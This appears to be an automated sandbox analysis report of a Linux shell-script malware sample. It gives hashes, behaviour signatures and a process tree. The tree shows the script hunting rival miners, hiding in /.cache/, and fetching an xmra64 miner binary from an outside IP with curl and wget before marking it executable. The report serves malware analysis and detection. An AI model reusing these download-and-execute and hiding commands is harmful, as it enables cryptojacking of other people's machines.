Analysis
-
max time kernel
121s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
30-06-2024 18:39
Static task
static1
Behavioral task
behavioral1
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Size
5KB
-
MD5
7b72cf30ac42c20f0a14b0b87425c00a
-
SHA1
74402152ac0f0c9dfed6f76975080ce1d0d4584d
-
SHA256
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
-
SHA512
1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
-
SSDEEP
96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
.kswapd.kswapdioc pid process /.cache/.kswapd 1991 .kswapd /.cache/.kswapd 2427 .kswapd -
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
grepchattrgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepchattrgrepgrepgrepgreppid process 1882 grep 1998 chattr 2107 grep 2143 grep 2255 grep 1818 grep 1946 grep 2383 grep 1662 grep 1958 grep 2135 grep 2151 grep 2203 grep 2315 grep 1622 grep 1906 grep 2367 grep 1714 grep 1766 grep 1786 grep 1842 grep 2183 grep 1678 grep 1830 grep 2083 grep 2099 grep 2119 grep 2171 grep 1878 grep 2123 grep 2131 grep 2339 grep 2407 grep 2275 grep 2303 grep 1626 grep 1694 grep 1874 grep 2067 grep 2215 grep 2267 grep 2379 grep 2127 grep 2283 grep 1746 grep 1930 grep 2063 grep 2091 grep 2199 grep 2295 grep 2291 grep 1658 grep 1782 grep 1834 grep 1850 grep 1898 grep 2219 grep 2043 grep 2211 grep 1565 chattr 1718 grep 1790 grep 1806 grep 1886 grep -
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 1 TTPs 1 IoCs
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.shdescription ioc process File opened for modification /usr/local/bin/.gCM8WmmCs9RAsj7u 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Reads CPU attributes 1 TTPs 6 IoCs
Processes:
pspspspspspsdescription ioc process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
pspspspspsgrepgreppsgrepgrepdescription ioc process File opened for reading /proc/438/cmdline ps File opened for reading /proc/453/status ps File opened for reading /proc/9/stat ps File opened for reading /proc/80/stat ps File opened for reading /proc/9/status ps File opened for reading /proc/169/cmdline ps File opened for reading /proc/85/cmdline ps File opened for reading /proc/1558/status ps File opened for reading /proc/177/stat ps File opened for reading /proc/1074/exe grep File opened for reading /proc/599/exe grep File opened for reading /proc/79/status ps File opened for reading /proc/185/status ps File opened for reading /proc/1047/status ps File opened for reading /proc/186/stat ps File opened for reading /proc/214/stat ps File opened for reading /proc/84/cmdline ps File opened for reading /proc/11/cmdline ps File opened for reading /proc/2020/cmdline ps File opened for reading /proc/1554/cmdline ps File opened for reading /proc/2/stat ps File opened for reading /proc/1140/status ps File opened for reading /proc/self/stat ps File opened for reading /proc/665/cmdline ps File opened for reading /proc/35/status ps File opened for reading /proc/178/cmdline ps File opened for reading /proc/498/status ps File opened for reading /proc/1585/status ps File opened for reading /proc/494/status ps File opened for reading /proc/3/cmdline ps File opened for reading /proc/510/status ps File opened for reading /proc/171/status ps File opened for reading /proc/692/exe grep File opened for reading /proc/179/cmdline ps File opened for reading /proc/30/status ps File opened for reading /proc/180/status ps File opened for reading /proc/1390/exe grep File opened for reading /proc/599/status ps File opened for reading /proc/973/stat ps File opened for reading /proc/1513/cmdline ps File opened for reading /proc/79/cmdline ps File opened for reading /proc/559/cmdline ps File opened for reading /proc/493/cmdline ps File opened for reading /proc/tty/drivers ps File opened for reading /proc/599/cmdline ps File opened for reading /proc/6/cmdline ps File opened for reading /proc/1070/stat ps File opened for reading /proc/35/stat ps File opened for reading /proc/476/cmdline ps File opened for reading /proc/1077/cmdline ps File opened for reading /proc/1090/stat ps File opened for reading /proc/747/cmdline ps File opened for reading /proc/1193/stat ps File opened for reading /proc/169/stat ps File opened for reading /proc/957/cmdline ps File opened for reading /proc/24/cmdline ps File opened for reading /proc/1157/status ps File opened for reading /proc/446/cmdline ps File opened for reading /proc/1149/cmdline ps File opened for reading /proc/1157/cmdline ps File opened for reading /proc/82/status ps File opened for reading /proc/177/status ps File opened for reading /proc/494/cmdline ps File opened for reading /proc/516/stat ps -
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.shdescription ioc process File opened for modification /dev/shm/.gCM8WmmCs9RAsj7u 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.shdescription ioc process File opened for modification /tmp/.gCM8WmmCs9RAsj7u 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Processes
-
/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh1⤵
- Write file to user bin folder
- Writes file to shm directory
- Writes file to tmp directory
-
/bin/unameuname -a2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep " rm does not remove dir"2⤵
-
/bin/rmrm --help2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep -i "Dump libcurl equivalent"2⤵
-
/usr/bin/curlcurl --help2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep -i "wgetrc "2⤵
-
/usr/bin/wgetwget --version2⤵
-
/usr/bin/trtr -dc A-Za-z0-92⤵
-
/usr/bin/headhead /dev/urandom2⤵
-
/usr/bin/shufshuf -i 4-16 -n 12⤵
-
/usr/bin/headhead -c 162⤵
-
/bin/rmrm -f /tmp/.gCM8WmmCs9RAsj7u2⤵
-
/bin/rmrm -f /tmp/.gCM8WmmCs9RAsj7u2⤵
-
/bin/rmrm -f /usr/local/bin/.gCM8WmmCs9RAsj7u2⤵
-
/bin/rmrm -f /dev/shm/.gCM8WmmCs9RAsj7u2⤵
-
/bin/rmrm -f /.gCM8WmmCs9RAsj7u2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v "sh "2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep " sleep 120"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep -v "sh "2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep " sleep 120"2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/sleepsleep 1202⤵
-
/bin/mkdirmkdir -p /.cache/2⤵
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
-
/bin/chmodchmod 1755 /.cache/2⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v l02⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi "java "2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -vi jenkins2⤵
-
/bin/grepgrep -vi exim2⤵
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵
-
/usr/bin/headhead -n 12⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v python2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi bash2⤵
-
/bin/grepgrep -vi exim2⤵
-
/bin/grepgrep -v l02⤵
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵
-
/usr/bin/uniquniq2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/readlinkreadlink /proc/324/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/324/exe2⤵
-
/bin/readlinkreadlink /proc/330/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/330/exe2⤵
-
/bin/readlinkreadlink /proc/414/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/414/exe2⤵
-
/bin/readlinkreadlink /proc/420/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/420/exe2⤵
-
/bin/readlinkreadlink /proc/430/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/430/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/436/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/436/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/438/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/438/exe2⤵
-
/bin/readlinkreadlink /proc/446/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/446/exe2⤵
-
/bin/readlinkreadlink /proc/453/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/453/exe2⤵
-
/bin/readlinkreadlink /proc/476/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/476/exe2⤵
-
/bin/readlinkreadlink /proc/487/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/487/exe2⤵
-
/bin/readlinkreadlink /proc/494/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/494/exe2⤵
-
/bin/readlinkreadlink /proc/498/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/498/exe2⤵
-
/bin/readlinkreadlink /proc/510/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/510/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/512/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/512/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/516/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/516/exe2⤵
-
/bin/readlinkreadlink /proc/532/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/532/exe2⤵
-
/bin/readlinkreadlink /proc/533/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/533/exe2⤵
-
/bin/readlinkreadlink /proc/575/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/575/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/577/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/577/exe2⤵
-
/bin/readlinkreadlink /proc/599/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/599/exe2⤵
-
/bin/readlinkreadlink /proc/620/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/620/exe2⤵
-
/bin/readlinkreadlink /proc/621/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/621/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/665/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/665/exe2⤵
-
/bin/readlinkreadlink /proc/674/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/674/exe2⤵
-
/bin/readlinkreadlink /proc/681/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/681/exe2⤵
-
/bin/readlinkreadlink /proc/683/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/683/exe2⤵
-
/bin/readlinkreadlink /proc/692/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/692/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/696/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/696/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/720/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/720/exe2⤵
-
/bin/readlinkreadlink /proc/747/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/747/exe2⤵
-
/bin/readlinkreadlink /proc/758/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/758/exe2⤵
-
/bin/readlinkreadlink /proc/930/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/930/exe2⤵
-
/bin/readlinkreadlink /proc/957/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/957/exe2⤵
-
/bin/readlinkreadlink /proc/961/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/961/exe2⤵
-
/bin/readlinkreadlink /proc/966/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/966/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/969/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/969/exe2⤵
-
/bin/readlinkreadlink /proc/973/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/973/exe2⤵
-
/bin/readlinkreadlink /proc/1023/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1023/exe2⤵
-
/bin/readlinkreadlink /proc/1033/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1033/exe2⤵
-
/bin/readlinkreadlink /proc/1047/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1047/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1053/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1053/exe2⤵
-
/bin/readlinkreadlink /proc/1066/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1066/exe2⤵
-
/bin/readlinkreadlink /proc/1070/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1070/exe2⤵
-
/bin/readlinkreadlink /proc/1074/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1074/exe2⤵
- Attempts to change immutable files
- Reads runtime system information
-
/bin/readlinkreadlink /proc/1077/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1077/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1080/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1080/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1090/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1090/exe2⤵
-
/bin/readlinkreadlink /proc/1094/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1094/exe2⤵
-
/bin/readlinkreadlink /proc/1103/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1103/exe2⤵
-
/bin/readlinkreadlink /proc/1113/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1113/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1124/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1124/exe2⤵
-
/bin/readlinkreadlink /proc/1128/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1128/exe2⤵
-
/bin/readlinkreadlink /proc/1132/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1132/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1136/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1136/exe2⤵
-
/bin/readlinkreadlink /proc/1140/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1140/exe2⤵
-
/bin/readlinkreadlink /proc/1144/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1144/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1149/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1149/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1153/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1153/exe2⤵
-
/bin/readlinkreadlink /proc/1155/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1155/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1157/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1157/exe2⤵
-
/bin/readlinkreadlink /proc/1158/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1158/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1163/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1163/exe2⤵
-
/bin/readlinkreadlink /proc/1173/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1173/exe2⤵
-
/bin/readlinkreadlink /proc/1174/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1174/exe2⤵
-
/bin/readlinkreadlink /proc/1176/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1176/exe2⤵
-
/bin/readlinkreadlink /proc/1177/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1177/exe2⤵
-
/bin/readlinkreadlink /proc/1182/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1182/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1192/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1192/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1193/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1193/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1194/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1194/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1195/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1195/exe2⤵
-
/bin/readlinkreadlink /proc/1196/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1196/exe2⤵
-
/bin/readlinkreadlink /proc/1199/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1199/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1203/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1203/exe2⤵
-
/bin/readlinkreadlink /proc/1236/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1236/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1239/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1239/exe2⤵
-
/bin/readlinkreadlink /proc/1260/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1260/exe2⤵
-
/bin/readlinkreadlink /proc/1267/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1267/exe2⤵
-
/bin/readlinkreadlink /proc/1280/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1280/exe2⤵
-
/bin/readlinkreadlink /proc/1292/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1292/exe2⤵
-
/bin/readlinkreadlink /proc/1300/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1300/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1312/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1312/exe2⤵
-
/bin/readlinkreadlink /proc/1317/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1317/exe2⤵
-
/bin/readlinkreadlink /proc/1322/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1322/exe2⤵
-
/bin/readlinkreadlink /proc/1350/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1350/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1358/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1358/exe2⤵
-
/bin/readlinkreadlink /proc/1390/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1390/exe2⤵
- Reads runtime system information
-
/bin/readlinkreadlink /proc/1485/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1485/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1510/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1510/exe2⤵
-
/bin/readlinkreadlink /proc/1512/cwd2⤵
-
/bin/catcat /proc/1512/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
-
/bin/readlinkreadlink /proc/1513/cwd2⤵
-
/bin/catcat /proc/1513/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
-
/bin/readlinkreadlink /proc/1514/cwd2⤵
-
/bin/catcat /proc/1514/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
-
/bin/readlinkreadlink /proc/1558/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1558/exe2⤵
-
/bin/readlinkreadlink /proc/1563/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1563/exe2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep x86_642⤵
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra64 -o /.cache/.kswapd2⤵
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra64 -O /.cache/.kswapd2⤵
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
-
/bin/sleepsleep 1202⤵
-
/bin/mkdirmkdir -p /.cache/2⤵
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
-
/bin/chmodchmod 1755 /.cache/2⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v l02⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -vi "java "2⤵
-
/bin/grepgrep -vi jenkins2⤵
-
/bin/grepgrep -vi exim2⤵
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵
-
/usr/bin/headhead -n 12⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v l02⤵
-
/bin/grepgrep -v python2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi bash2⤵
-
/bin/grepgrep -vi exim2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵
-
/bin/grepgrep -v eth02⤵
-
/usr/bin/uniquniq2⤵
-
/bin/readlinkreadlink /proc/324/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/324/exe2⤵
-
/bin/readlinkreadlink /proc/330/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/330/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/414/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/414/exe2⤵
-
/bin/readlinkreadlink /proc/420/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/420/exe2⤵
-
/bin/readlinkreadlink /proc/430/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/430/exe2⤵
-
/bin/readlinkreadlink /proc/436/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/436/exe2⤵
-
/bin/readlinkreadlink /proc/438/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/438/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/446/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/446/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/453/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/453/exe2⤵
-
/bin/readlinkreadlink /proc/476/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/476/exe2⤵
-
/bin/readlinkreadlink /proc/487/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/487/exe2⤵
-
/bin/readlinkreadlink /proc/494/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/494/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/498/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/498/exe2⤵
-
/bin/readlinkreadlink /proc/510/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/510/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/512/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/512/exe2⤵
-
/bin/readlinkreadlink /proc/516/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/516/exe2⤵
- Attempts to change immutable files
-
